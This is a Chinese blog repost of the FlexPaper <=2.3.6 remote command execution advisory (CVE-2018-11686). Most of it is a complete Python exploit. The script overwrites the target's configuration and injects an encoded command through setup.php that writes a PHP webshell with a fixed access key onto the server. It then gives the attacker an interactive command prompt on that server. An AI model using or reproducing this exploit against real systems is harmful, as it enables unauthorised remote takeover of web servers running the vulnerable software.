影响版本:小于FlexPaper 2.3.6的所有版本

FlexPaper (https://www.flowpaper.com)

是一个开源项目,遵循GPL协议,在互联网上非常流行。它为web客户端、移动设备和平板设备提供文档的查看功能。至少在2014年之前,维基解密一直在广泛的使用该组件,漏洞产生的原因是受到一个XSS漏洞补丁的影响。

Red Timmy Sec在FlexPaper上发现了一个远程命令执行漏洞。供应商立即联系并注册了CVE 2018-11686。尽管这个项目的2.3.7版本已经发布了一个补丁,但是这个漏洞本身直到现在仍然没有被公开。

关于这个漏洞的详细情况请看:https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/

文末附Exp.

----------------

FlexPaper <=2.3.6 Remote Command Execution

FlexPaper (https://www.flowpaper.com) is an open source project, released under GPL license, quite widespread over the internet. It provides document viewing functionalities to web clients, mobile and tablet devices. At least until 2014 the component has been actively used by WikiLeaks, when it was discovered to be affected by a XSS vulnerability subsequently patched.

Around one year ago Red Timmy Sec discovered a Remote Command Execution vulnerability on FlexPaper. The vendor was immediately contacted and a CVE registered (2018-11686). However the vulnerability itself has remained undisclosed until now, regardless the fact that a patch has been issued with the release 2.3.7 of the project.

Full analysis of this vulnerability can be found here: https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/

----------------

Exp(Exploit):

1 #!/usr/bin/env python

2 #Exploit Title: FlexPaper PHP Publish Service <= 2.3.6 RCE

3 #Date: March 2019

4 #Exploit Author: Red Timmy Security - redtimmysec.wordpress.com

5 #Vendor Homepage: https://flowpaper.com/download/

6 #Version: <= 2.3.6

7 #Tested on: Linux/Unix

8 #CVE : CVE-2018-11686

9 #Disclamer: This exploit is for educational purpose only

10 #More details on https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/

11

12 importsys13 importrequests14 importreadline15 importurllib216 importssl17

18 try:19 url = sys.argv[1]20 except:21 print "[-] usage $python shredpaper.py http://targert.com/flexpaper/"

22 print sys.exit(1)23

24 print """

25 __ __26 _____/ /_ ________ ____/ ____ ____ _____ ___ _____27 / ___/ __ \/ ___/ _ \/ __ / __ \/ __ `/ __ \/ _ \/ ___/28 (__ / / / / / / __/ /_/ / /_/ / /_/ / /_/ / __/ /29 /____/_/ /_/_/ \___/\__,_/ .___/\__,_/ .___/\___/_/30 /_/ /_/31 """

32

33 print "[*] FlexPaper <= 2.3.6 Remote Command Execution - Red Timmy Security)"

34 print "[*] Attacking %s" %url35 print "[*] Deleting target configuration file"

36 payload = (("SAVE_CONFIG","1"),("PDF_Directory","/var/www/html/flex2.3.6/flexpaper/pdf"),("SWF_Directory","config/"),("LICENSEKEY",""),("splitmode","1"),("RenderingOrder_PRIM","flash"),("RenderingOrder_SEC","html"))37 url1 = url+"/php/change_config.php"

38 r1 = requests.post(url1, data=payload)39 rx = requests.post(url1, data=payload) #resend

40 shellcode = "%69%64%3b%65%63%68%6f%20%50%44%39%77%61%48%41%4b%43%69%52%72%5a%58%6b%67%50%53%41%6b%58%30%64%46%56%46%73%6e%59%57%4e%6a%5a%58%4e%7a%4a%31%30%37%43%67%70%70%5a%69%67%6b%61%32%56%35%50%54%30%6e%4d%44%6b%34%4e%7a%63%7a%4e%7a%59%78%4d%54%59%30%4e%7a%49%33%4e%44%49%33%4f%44%51%7a%4d%6a%51%34%4d%6a%52%74%65%47%31%74%65%47%30%6e%4b%58%73%4b%43%67%6c%6c%59%32%68%76%49%48%4e%6f%5a%57%78%73%58%32%56%34%5a%57%4d%6f%59%6d%46%7a%5a%54%59%30%58%32%52%6c%59%32%39%6b%5a%53%67%6b%58%30%64%46%56%46%73%6e%59%32%31%6b%4a%31%30%70%4b%54%73%4b%43%6e%30%37%43%6a%38%2b%43%67%3d%3d%7c%62%61%73%65%36%34%20%2d%64%20%3e%24%28%70%77%64%29%2f%74%69%67%65%72%5f%73%68%65%6c%6c%2e%70%68%70%3b%69%64"

41

42 print "[*] Uploading webshell.."

43 url2 = url+"/php/setup.php?step=2&PDF2SWF_PATH="+shellcode44 r2 =requests.get(url2)45 print "[*] Checking if shell is uploaded successfully"

46

47 webshell = url+ '/php/tiger_shell.php'

48

49 check_shell =requests.get(webshell)50 if check_shell.status_code == 200:51 print "[*] We got a shell"

52 else:53 print "[-] Exploit failed, die"

54 sys.exit(2)55 ctx =ssl.create_default_context()56 ctx.check_hostname =False57 ctx.verify_mode =ssl.CERT_NONE58 whileTrue:59 cmd = raw_input("enter cmd>>")60 cmd =cmd.strip()61 cmd = cmd.encode('base64').strip().replace("\n","")62 link = url+"/php/tiger_shell.php?cmd=%s&access=09877376116472742784324824mxmmxm" %cmd.strip()63 #print link

64 try:65 response = urllib2.urlopen(link, context=ctx)66 page =response.read()67 printpage68 exceptException as exc:69 printexc70 continue

flexpaper php 代码,FlexPaper 2.3.6 远程命令执行漏洞 附Exp相关推荐

  1. 远程命令执行漏洞与远程代码执行漏洞33333

    远程命令执行漏洞的概念 远程命令执行漏洞,指用户通过浏览器提交执行操作命令, 由于服务器端,没有针对执行函数做过滤,就执行了恶意命令 远程代码执行漏洞概念 代码执行漏洞也叫代码注入漏洞,指用户通过浏览 ...

  2. webmin远程命令执行漏洞(cve-2019-15107)深入分析

    漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...

  3. 【注意】关于Redis存在远程命令执行漏洞的安全公告

    点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 来源:CNVD漏洞平台 安全公告编号:CNTA-2019-0024 2019年7月10日,国 ...

  4. jenkins java反序列化_Jenkins “Java 反序列化”过程远程命令执行漏洞

    ###漏洞原理 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例化操作用于恢复之前序列化时的对象.在原博文所提到的那些 Java ...

  5. ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞

    ThinkPHP 5.0.x.5.1.x.5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架.借鉴Struts框架的Action对象,同 ...

  6. 又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析

    本文讲的是又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析, 早在2015年,FireEye曾发布过两次关于Office的Encapsulated PostScript (EPS)图形文 ...

  7. 紧急:Spring框架被爆出存在0day级别远程命令执行漏洞。漏洞危害程度不亚于log4j漏洞根据目前掌握的信息,JDK版本在9及以上的Spring框架均受影响。该漏洞目前无官方修复补丁

    Spring框架被爆出存在0day级别远程命令执行漏洞.漏洞危害程度不亚于log4j漏洞根据目前掌握的信息,JDK版本在9及以上的Spring框架均受影响. 漏洞信息和漏洞影响排查方法如下: 漏洞名称 ...

  8. Yapi远程命令执行漏洞

    命令执行漏洞利用的条件? 攻击者可以控制eval函数的参数 [漏洞名称] Yapi远程命令执行漏洞 [漏洞详情] Yapi接口管理平台,使用Mock数据/脚本作为中间交互层,为前端后台开发与测试人员提 ...

  9. PHPMailer远程命令执行漏洞复现

    ​PHPMailer远程命令执行漏洞复现 一.漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, ...

最新文章

  1. 思维dp ---- CF41D Pawn [可达状态统计dp]
  2. CMAKE支持c++11的两种方式
  3. PostgreSQL在何处处理 sql查询之二十一
  4. MariaDB Spider:实现MySQL横纵向扩展的小能手
  5. JS的隐式转换 从 [] ==false 说起
  6. java吧王者_java单排上王者!(一) java内存
  7. 树莓派基金会来号召用键盘生物学家研究企鹅
  8. IT都包括什么?零基础适合学哪一样?
  9. arcgis 属性表中起点终点创建线_【ArcGIS开发】shapefile矢量数据遍历、求交、与属性更新...
  10. 实战开发,使用 Spring Session 与 Spring security 完成网站登录改造!!
  11. Unity 工具之 UniWebView 内嵌网页/浏览器到应用中,并且根据UGUI大小放置(简单适配UGUI)
  12. C语言中的除法运算符
  13. 网站性能优化的10种方法
  14. Ubuntu12.04 在线安装JDK7
  15. 【进制转换】如何使用C++将2进制转换为16进制?
  16. ElasticsearchException解决方案
  17. 编程彩虹c语言,c – 如何渲染彩虹光谱?
  18. BGP路由器协议排错教程:BGP 路由通告的排错
  19. 制度化规范化标准化精细化_何为规范化、标准化、精细化管理
  20. php中对数组进行转码,PHP 数组转码

热门文章

  1. linux配置磁盘阵列raid 0、raid1 、raid5 、raid6 、raid10、raid50、raid60原理
  2. 搭建博客,使用hexo-theme-matery主题无效果
  3. 同花顺python_小白学 Python 爬虫(25):爬取股票信息
  4. Photoshop给草坡上的人物加上大气的霞光
  5. numpy学习笔记-花哨的索引
  6. 关于十进制转换成n进制问题的解法
  7. Can't use Subversion command line client: C:\Program Files\TortoiseSVN\bin\svn.exe
  8. python批量修改文件名,并且文件名长度对齐
  9. sql 左连接行数增加本质
  10. SQLZOO部分题目解析【后续更新】